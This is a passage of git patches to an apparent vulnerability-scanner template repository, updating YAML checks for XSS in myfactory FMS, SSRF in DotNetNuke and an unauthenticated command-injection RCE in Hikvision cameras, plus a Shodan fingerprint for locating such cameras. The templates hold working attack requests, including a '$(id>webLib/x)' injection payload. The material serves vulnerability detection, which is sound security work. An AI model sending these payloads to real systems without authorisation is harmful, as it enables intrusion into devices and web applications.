https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2021-42566 cwe-id: CWE-79 + tags: cve,cve2021,myfactory,xss requests: - method: GET path: - - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%27)%3Balert(1)%3B%2F%2F' - - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%27)%3Balert(1)%3B%2F%2F' + - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: @@ -28,12 +28,13 @@ requests: - 200 - type: word - words: - - ";alert(1);//" part: body + words: + - "</script><script>alert(document.domain)</script>" condition: and - type: word + part: header words: - "text/html" - part: header + From 7f9490d7624d6a0693d8800d91419108d983deef Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 29 Oct 2021 00:25:12 +0530 Subject: [PATCH 136/145] Update CVE-2021-42565.yaml --- cves/2021/CVE-2021-42565.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-42565.yaml b/cves/2021/CVE-2021-42565.yaml index 7d8132bf90..cf0a4645f8 100644 --- a/cves/2021/CVE-2021-42565.yaml +++ b/cves/2021/CVE-2021-42565.yaml @@ -3,9 +3,8 @@ id: CVE-2021-42565 info: author: madrobot name: myfactory FMS - Reflected XSS - description: myfactory.FMS before 7.1-912 allows XSS via the UID parameter. severity: medium - tags: cve,cve2021,myfactory,xss + description: myfactory.FMS before 7.1-912 allows XSS via the UID parameter. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566 - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms @@ -14,12 +13,13 @@ info: cvss-score: 6.10 cve-id: CVE-2021-42565 cwe-id: CWE-79 + tags: cve,cve2021,myfactory,xss requests: - method: GET path: - - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3Cscript%3Ealert(1)%3C/script%3E' - - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3Cscript%3Ealert(1)%3C/script%3E' + - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: @@ -28,12 +28,12 @@ requests: - 200 - type: word - words: - - "<script>alert(1)</script>" part: body + words: + - "</script><script>alert(document.domain)</script>" condition: and - type: word + part: header words: - "text/html" - part: header From e58e1ef96dff0b2ac32d7e10c5b75366d2f06622 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 29 Oct 2021 00:25:45 +0530 Subject: [PATCH 137/145] Update CVE-2021-42566.yaml --- cves/2021/CVE-2021-42566.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2021/CVE-2021-42566.yaml b/cves/2021/CVE-2021-42566.yaml index b8266aa918..ce8fb35f82 100644 --- a/cves/2021/CVE-2021-42566.yaml +++ b/cves/2021/CVE-2021-42566.yaml @@ -37,4 +37,3 @@ requests: part: header words: - "text/html" - From ffee9148ad40feb457e0e942b73d297cb439e06d Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Fri, 29 Oct 2021 00:27:57 +0530 Subject: [PATCH 138/145] Update and rename binance-rest-api.yaml to api-binance.yaml --- token-spray/{binance-rest-api.yaml => api-binance.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename token-spray/{binance-rest-api.yaml => api-binance.yaml} (90%) diff --git a/token-spray/binance-rest-api.yaml b/token-spray/api-binance.yaml similarity index 90% rename from token-spray/binance-rest-api.yaml rename to token-spray/api-binance.yaml index fcacd484de..064b6f6f1d 100644 --- a/token-spray/binance-rest-api.yaml +++ b/token-spray/api-binance.yaml @@ -1,7 +1,7 @@ -id: binance-rest-api +id: api-binance info: - name: Binance REST API Test + name: Binance REST API author: geeknik severity: info reference: https://github.com/binance/binance-spot-api-docs/blob/master/rest-api.md From 8f4a90f33a6486ee3b72793a2b35c168c61fe6ea Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 29 Oct 2021 13:47:09 +0530 Subject: [PATCH 139/145] Added Hikvision RCE (CVE-2021-36260) --- cves/2021/CVE-2021-36260.yaml | 47 +++++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 cves/2021/CVE-2021-36260.yaml diff --git a/cves/2021/CVE-2021-36260.yaml b/cves/2021/CVE-2021-36260.yaml new file mode 100644 index 0000000000..85e67c2ede --- /dev/null +++ b/cves/2021/CVE-2021-36260.yaml @@ -0,0 +1,47 @@ +id: CVE-2021-36260 + +info: + name: Unauthenticated Hikvision IP camera/NVR firmware RCE + author: pdteam + severity: critical + description: A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands. + reference: + - https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html + - https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-36260 + - https://github.com/Aiminsun/CVE-2021-36260 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-36260 + cwe-id: CWE-77,CWE-20 + tags: cve,cve2021,hikvision,rce,iot,intrusive + +requests: + - raw: + - | + PUT /SDK/webLanguage HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + <?xml version="1.0" encoding="UTF-8"?><language>$(id>webLib/x)</language> + + - | + GET /x HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "contains(body_2,'uid=') && contains(body_2,'gid=')" + + - type: status + status: + - 200 + + extractors: + - type: regex + regex: + - "(u|g)id=.*" From f6576aa657c5541c5ba7005707a7dc83d22cb0f7 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 29 Oct 2021 14:19:30 +0530 Subject: [PATCH 140/145] Added hikvision detection template --- technologies/hikvision-detection.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/hikvision-detection.yaml diff --git a/technologies/hikvision-detection.yaml b/technologies/hikvision-detection.yaml new file mode 100644 index 0000000000..7c6f18dda0 --- /dev/null +++ b/technologies/hikvision-detection.yaml @@ -0,0 +1,25 @@ +id: hikvision-detection + +info: + name: Hikvision Detection + author: pdteam + severity: info + tags: tech,hikvision + +requests: + - method: GET + path: + - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/doc/page/login.asp" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + words: + - "Hikvision Digital Technology" + + - type: dsl + name: favicon + dsl: + - "status_code==200 && ('999357577' == mmh3(base64_py(body)))" \ No newline at end of file From 3ea77a318be7c01981dababf889c31b5a47411ed Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 29 Oct 2021 14:22:12 +0530 Subject: [PATCH 141/145] Added Hikvision workflow --- workflows/hikvision-workflow.yaml | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 workflows/hikvision-workflow.yaml diff --git a/workflows/hikvision-workflow.yaml b/workflows/hikvision-workflow.yaml new file mode 100644 index 0000000000..95b090366a --- /dev/null +++ b/workflows/hikvision-workflow.yaml @@ -0,0 +1,12 @@ +id: hikvision-workflow + +info: + name: Hikvision Security Checks + author: pdteam + description: A simple workflow that runs all Hikvision related nuclei templates on a given target. + +workflows: + + - template: technologies/hikvision-detection.yaml + subtemplates: + - template: cves/2021/CVE-2021-36260.yaml \ No newline at end of file From a451cfb48a5157ac7d9d88c42efda23ef614c9e7 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 29 Oct 2021 14:24:20 +0530 Subject: [PATCH 142/145] misc update --- cves/2021/CVE-2021-36260.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-36260.yaml b/cves/2021/CVE-2021-36260.yaml index 85e67c2ede..6d3276abe8 100644 --- a/cves/2021/CVE-2021-36260.yaml +++ b/cves/2021/CVE-2021-36260.yaml @@ -1,8 +1,8 @@ id: CVE-2021-36260 info: - name: Unauthenticated Hikvision IP camera/NVR firmware RCE - author: pdteam + name: Hikvision IP camera/NVR - Unauthenticated RCE + author: pdteam,gy741 severity: critical description: A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands. reference: From f635c80512564a5d37fc6c530806f6d92d3010e9 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 29 Oct 2021 14:49:58 +0530 Subject: [PATCH 143/145] Adding metadata --- cves/2021/CVE-2021-36260.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2021/CVE-2021-36260.yaml b/cves/2021/CVE-2021-36260.yaml index 6d3276abe8..77c5592d49 100644 --- a/cves/2021/CVE-2021-36260.yaml +++ b/cves/2021/CVE-2021-36260.yaml @@ -15,6 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36260 cwe-id: CWE-77,CWE-20 + metadata: + shodan-query: http.favicon.hash:999357577 tags: cve,cve2021,hikvision,rce,iot,intrusive requests: From 4024822ddff966405147aeb80657b82459bc7f1c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 29 Oct 2021 15:56:24 +0530 Subject: [PATCH 144/145] misc updates --- cves/2017/CVE-2017-0929.yaml | 20 ++++++++++++++------ 1 file changed, 14 insertions(+), 6 deletions(-) diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml index ebe7ad1e9c..bd7c9bcac5 100644 --- a/cves/2017/CVE-2017-0929.yaml +++ b/cves/2017/CVE-2017-0929.yaml @@ -1,24 +1,32 @@ id: CVE-2017-0929 + info: - name: DotNetNuke ImageHandler SSRF (CVE-2017-0929) + name: DotNetNuke ImageHandler SSRF + author: charanrayudu,meme-lord severity: high + description: DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources. reference: - https://hackerone.com/reports/482634 - author: CharanRayudu, meme-lord - tags: cve,cve2017,ssrf,dotnetnuke + - https://nvd.nist.gov/vuln/detail/CVE-2017-0929 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2017-0929 cwe-id: CWE-918 - description: "DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources." + tags: cve,cve2017,oast,ssrf,dnn requests: - method: GET path: - - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url={{interactsh-url}}' + - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}' + + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "dns" + - "http" + + - type: status + status: + - 500 \ No newline at end of file From b46d57263659a40acf87242fe7ccad2527ce27f0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 29 Oct 2021 10:29:18 +0000 Subject: [PATCH 145/145] Auto Generated CVE annotations [Fri Oct 29 10:29:18 UTC 2021] :robot: --- cves/2021/CVE-2021-42258.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml index 64def1d504..fa314b25b7 100644 --- a/cves/2021/CVE-2021-42258.yaml +++ b/cves/2021/CVE-2021-42258.yaml @@ -3,7 +3,7 @@ id: CVE-2021-42258 info: name: BillQuick Web Suite SQLi author: dwisiswant0 - severity: high + severity: critical tags: cve,cve2021,sqli,billquick description: | BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 @@ -15,6 +15,11 @@ info: reference: - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware - https://nvd.nist.gov/vuln/detail/CVE-2021-42258 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-42258 + cwe-id: CWE-89 requests: - raw: